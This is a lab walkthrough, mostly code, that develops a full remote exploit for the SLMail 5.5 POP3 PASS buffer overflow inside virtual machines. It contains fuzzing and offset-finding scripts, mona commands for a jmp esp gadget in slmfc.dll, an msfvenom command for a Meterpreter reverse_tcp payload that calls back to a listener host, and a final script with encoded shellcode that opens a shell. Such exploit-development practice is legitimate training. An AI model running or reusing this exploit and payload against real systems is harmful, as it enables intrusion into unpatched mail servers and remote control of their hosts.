So that the host machine stays safe from whatever runs during this exercise, do it inside a VM (VMware or VirtualBox).

Download the Windows 7 OVF from Microsoft's official site.

Install the prerequisites first.

First test: a buffer overflow with 2700 'A's, sent as the argument of the POP3 PASS command.

#!/usr/bin/python
# Python 2. Sends 2700 'A's as the POP3 PASS argument to SLMail on port 110.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A' * 2700                        # overflow candidate

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.119.150', 110))    # Windows VM running SLMail
    data = s.recv(1024)                    # POP3 banner
    print data
    s.send('USER test' + '\r\n')
    data = s.recv(1024)
    print data
    s.send('PASS ' + buffer + 'test\r\n')  # the overflow goes in PASS
    print "\nDone!"
except socket.error:
    print "Could not connect to POP3!"
finally:
    s.close()

SLMail crashes with EIP = 0x41414141 ("AAAA"): the saved return address on the stack has been overwritten with bytes from our buffer.

Start the Kali Linux VM and use pattern_create.rb to generate a unique, non-repeating pattern of the same length, so that the four bytes that land in EIP identify their own position in the buffer.

# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700 > /tmp/pattern

Try again, with the pattern as the buffer:

#!/usr/bin/python
# Python 2. Same exchange as before, but the PASS argument is the cyclic pattern.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# /tmp/pattern was written by pattern_create.rb on this (Kali) machine;
# drop the trailing newline so it does not end up inside the POP3 command.
buffer = open('/tmp/pattern', 'r').read().rstrip('\r\n')

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.119.150', 110))
    data = s.recv(1024)
    print data
    s.send('USER test' + '\r\n')
    data = s.recv(1024)
    print data
    s.send('PASS ' + buffer + 'test\r\n')
    print "\nDone!"
except socket.error:
    print "Could not connect to POP3!"
finally:
    s.close()

Result: SLMail 5.5 crashes with EIP = 0x39694438.

Restart the Windows VM before the next attempt.

Look up the offset at which those four bytes sit in the pattern, i.e. the exact position that overwrites EIP:

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
[*] Exact match at offset 2606
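How pattern_create.rb and pattern_offset.rb arrive at 2606 is worth seeing in code. The following is an added example written for this page (not Metasploit's own code and not part of the original walkthrough): it rebuilds the same cyclic pattern, looks up the little-endian bytes of the crashing EIP value, and checks the answer in the other direction (which EIP a given offset must produce). The length 2700 and the EIP value 0x39694438 are the ones from this page; everything else is illustrative.

```python
import struct
from itertools import product

# Same alphabet and ordering as Metasploit's pattern_create.rb
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1Aa2...Ab0Ab1... truncated to `length` bytes.

    Every 4-byte window is unique within the first 20280 bytes, so whatever
    lands in EIP pins down exactly where in the buffer it came from.
    """
    triples = []
    for hi, lo, dg in product(UPPER, LOWER, DIGITS):   # the digit cycles fastest
        triples.append(hi + lo + dg)
        if len(triples) * 3 >= length:
            break
    return "".join(triples)[:length].encode("ascii")


def pattern_offset(length, eip):
    """Offset of the 4 bytes that ended up in EIP, or None if not found.

    x86 is little-endian: EIP = 0x39694438 means the bytes 38 44 69 39
    ("8Di9") sat in memory in that order, so pack the value with "<I".
    """
    pat = pattern_create(length)
    idx = pat.find(struct.pack("<I", eip))
    return None if idx == -1 else idx


def expected_eip(length, offset):
    """Inverse check: the EIP value a crash must show if `offset` is right."""
    window = pattern_create(length)[offset:offset + 4]
    return struct.unpack("<I", window)[0]


if __name__ == "__main__":
    off = pattern_offset(2700, 0x39694438)
    print("offset:", off)                                        # 2606
    print("EIP for that offset: 0x%08x" % expected_eip(2700, off))
```

If pattern_offset returns None, the usual causes are an EIP value read in the wrong byte order or a pattern longer than 20280 bytes, where windows start to repeat; in the second case shorten the buffer before trusting any offset.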

EIP is overwritten starting at byte 2606 of the buffer. So: 2606 bytes of padding, then four 'B's that should land exactly in EIP (expected value 0x42424242), then 'C's to keep the total at 2700 bytes.

#!/usr/bin/python
# Python 2. Checks the offset: 2606 'A's, 4 'B's for EIP, 'C's for the rest.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A" * 2606 + "BBBB" + "C" * (2700 - 2606 - 4)

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.119.150', 110))
    data = s.recv(1024)
    print data
    s.send('USER test' + '\r\n')
    data = s.recv(1024)
    print data
    s.send('PASS ' + buffer + 'test\r\n')
    print "\nDone!"
except socket.error:
    print "Could not connect to POP3!"
finally:
    s.close()

Result as expected: EIP = 0x42424242 ("BBBB"). ESP points into the 'C's that follow the return address, which is what makes a jmp esp gadget usable as the return address in the next step.

Restart the Windows VM before the next attempt.

Find a module loaded by SLMail 5.5 whose addresses can be hard-coded:

!mona modules

!mona modules lists every loaded module with its protections (Rebase, SafeSEH, ASLR, NXCompat). slmfc.dll has none of them enabled, so an address inside it stays the same across restarts and is usable as a fixed return address.

Search slmfc.dll for a jmp esp gadget (opcode bytes ff e4):

!mona find -s "\xff\xe4" -m slmfc.dll

Result: 0x5f4a358f can be used as the gadget.

Test with the gadget as the return address. It is written little-endian, so 0x5f4a358f becomes "\x8f\x35\x4a\x5f":

#!/usr/bin/python
# Python 2. Return address = jmp esp in slmfc.dll (0x5f4a358f, little-endian);
# the 'B's after it are what ESP points at when the gadget runs.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "B" * 16

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.119.150', 110))
    data = s.recv(1024)
    s.send('USER username\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    s.close()
    print "\nDone!"
except socket.error:
    print "Could not connect to POP3!"

In the debugger, press Ctrl+G and enter the gadget address (0x5f4a358f).

Press F2 there to set a breakpoint.

When the exploit runs, execution stops at that breakpoint: EIP equals the gadget address, which confirms that the return address we supplied is the one being used.

Generate shellcode so the exploit spawns a shell. The -b option excludes the bytes that would cut the buffer short: \x00 terminates the string on the C side, and \x0a and \x0d terminate the POP3 command line. -e x86/shikata_ga_nai encodes the payload so that none of those bytes appear in it.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.147 LPORT=443 -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
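Before wiring the shellcode into the exploit it is worth checking, offline, that neither the shellcode nor the little-endian return address contains one of the excluded bytes, and knowing how a bad character would be spotted if msfvenom's list were incomplete. The block below is an added example written for this page (not SLMail, Metasploit or mona code): it builds the probe array that !mona bytearray would produce, compares a sent probe against a constructed stand-in for the stack contents the way !mona compare does, and assembles the final buffer with the page's offset (2606), gadget (0x5f4a358f) and 16-byte NOP sled. The stack dump and the placeholder shellcode are constructed for illustration.

```python
import struct

# Bytes that must never appear after "PASS ": 0x00 ends the C string inside
# SLMail, 0x0a and 0x0d end the POP3 command line (the -b values above).
BADCHARS = b"\x00\x0a\x0d"

OFFSET = 2606            # padding before EIP, from pattern_offset.rb
JMP_ESP = 0x5f4a358f     # jmp esp inside slmfc.dll, from !mona find
NOP_SLED = 16            # slack for the shikata_ga_nai decoder to unpack into


def badchar_probe(bad=BADCHARS):
    """Every byte 0x01..0xff except the known-bad ones, in ascending order.

    Sent in place of the shellcode; the copy found on the stack in the
    debugger is then compared with what was sent (what !mona compare does).
    """
    return bytes(b for b in range(1, 256) if b not in bad)


def first_mismatch(sent, on_stack):
    """(index, sent byte) of the first byte that did not survive, or None.

    A truncated copy means the byte right after the last matching one
    terminated the string; a changed byte means the server transformed it.
    """
    for i, (a, b) in enumerate(zip(sent, on_stack)):
        if a != b:
            return i, a
    if len(on_stack) < len(sent):
        return len(on_stack), sent[len(on_stack)]
    return None


def find_badchars(blob, bad=BADCHARS):
    """Offsets inside `blob` where a forbidden byte occurs (empty if clean)."""
    return [i for i, b in enumerate(blob) if b in bad]


def build_buffer(shellcode, offset=OFFSET, ret=JMP_ESP, nops=NOP_SLED):
    """padding | return address | NOP sled | shellcode, as the final exploit lays it out.

    Refuses to build if the little-endian return address or the shellcode
    contains a bad byte, so the check happens before anything hits the wire.
    """
    ret_bytes = struct.pack("<I", ret)      # 0x5f4a358f -> \x8f\x35\x4a\x5f
    for name, blob in (("return address", ret_bytes), ("shellcode", shellcode)):
        hits = find_badchars(blob)
        if hits:
            raise ValueError("%s contains bad chars at offsets %s" % (name, hits))
    return b"A" * offset + ret_bytes + b"\x90" * nops + shellcode


def pop3_pass_line(buf):
    """The exact bytes sent on the socket; the trailing CRLF ends the command."""
    return b"PASS " + buf + b"\r\n"


if __name__ == "__main__":
    # Constructed stand-in for a stack dump in which byte 0x0b came back as 0x00.
    probe = badchar_probe()
    seen = probe[:9] + b"\x00" + probe[10:]
    print("first mismatch:", first_mismatch(probe, seen))       # (9, 11)
    buf = build_buffer(b"\xcc" * 4)                             # int3 x4 placeholder
    print("return address bytes:", buf[OFFSET:OFFSET + 4])      # b'\x8f5J_'
```

When a probe comparison reports a mismatch, add that byte to the -b list, regenerate the shellcode, and send the probe again: a byte can mask the ones that follow it, so the search is repeated until the whole array survives intact.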

Test the exploit with the shellcode:

#!/usr/bin/python
# Python 2. Final exploit: padding, jmp esp return address, NOP sled, shellcode.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# msfvenom output (windows/meterpreter/reverse_tcp, shikata_ga_nai, no \x00 \x0a \x0d)
buf =  ""
buf += "\xbf\xa2\xa4\x91\xa4\xd9\xcf\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x54\x31\x78\x13\x03\x78\x13\x83\xc0\xa6\x46"
buf += "\x64\x58\x4e\x04\x87\xa1\x8e\x69\x01\x44\xbf\xa9\x75"
buf += "\x0c\xef\x19\xfd\x40\x03\xd1\x53\x71\x90\x97\x7b\x76"
buf += "\x11\x1d\x5a\xb9\xa2\x0e\x9e\xd8\x20\x4d\xf3\x3a\x19"
buf += "\x9e\x06\x3a\x5e\xc3\xeb\x6e\x37\x8f\x5e\x9f\x3c\xc5"
buf += "\x62\x14\x0e\xcb\xe2\xc9\xc6\xea\xc3\x5f\x5d\xb5\xc3"
buf += "\x5e\xb2\xcd\x4d\x79\xd7\xe8\x04\xf2\x23\x86\x96\xd2"
buf += "\x7a\x67\x34\x1b\xb3\x9a\x44\x5b\x73\x45\x33\x95\x80"
buf += "\xf8\x44\x62\xfb\x26\xc0\x71\x5b\xac\x72\x5e\x5a\x61"
buf += "\xe4\x15\x50\xce\x62\x71\x74\xd1\xa7\x09\x80\x5a\x46"
buf += "\xde\x01\x18\x6d\xfa\x4a\xfa\x0c\x5b\x36\xad\x31\xbb"
buf += "\x99\x12\x94\xb7\x37\x46\xa5\x95\x5f\xab\x84\x25\x9f"
buf += "\xa3\x9f\x56\xad\x6c\x34\xf1\x9d\xe5\x92\x06\xe2\xdf"
buf += "\x63\x98\x1d\xe0\x93\xb0\xd9\xb4\xc3\xaa\xc8\xb4\x8f"
buf += "\x2a\xf5\x60\x25\x21\x61\x4b\x12\x42\xe2\x23\x61\xad"
buf += "\x05\x0f\xec\x4b\x55\x3f\xbf\xc3\x15\xef\x7f\xb4\xfd"
buf += "\xe5\x8f\xeb\x1d\x06\x5a\x84\xb7\xe9\x33\xfc\x2f\x93"
buf += "\x19\x76\xce\x5c\xb4\xf2\xd0\xd7\x3d\x02\x9e\x1f\x37"
buf += "\x10\xf6\x41\xb7\xe8\x06\xe8\xb7\x82\x02\xba\xe0\x3a"
buf += "\x08\x9b\xc7\xe4\xf3\xce\x5b\xe2\x0b\x8f\x6d\x98\x3d"
buf += "\x05\xd2\xf6\x41\xc9\xd2\x06\x17\x83\xd2\x6e\xcf\xf7"
buf += "\x80\x8b\x10\x22\xb5\x07\x84\xcd\xec\xf4\x0f\xa6\x12"
buf += "\x22\x67\x69\xec\x01\xf4\x6e\x12\xd7\xd8\xd6\x7b\x27"
buf += "\x5c\xe7\x7b\x4d\x5c\xb7\x13\x9a\x73\x38\xd4\x63\x5e"
buf += "\x11\x7c\xe9\x0e\xd3\x1d\xee\x1b\xb5\x83\xef\xaf\x6e"
buf += "\xd5\x61\x50\x91\xda\x83\x6d\x47\xe3\xf1\xb6\x5b\x50"
buf += "\x09\x8d\xfe\xf1\x80\xed\xad\x02\x81"
# The 16 NOPs give the shikata_ga_nai decoder room to unpack without
# overwriting its own bytes; execution slides through them into buf.
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + buf

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.119.150', 110))
    data = s.recv(1024)
    s.send('USER username\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    s.close()
    print "\nDone!"
except socket.error:
    print "Could not connect to POP3!"

Start a listener in msfconsole (exploit/multi/handler, with the same payload, LHOST and LPORT that were given to msfvenom):

Run the exploit:

Result: a shell is spawned, and the Meterpreter session opens on the listener.
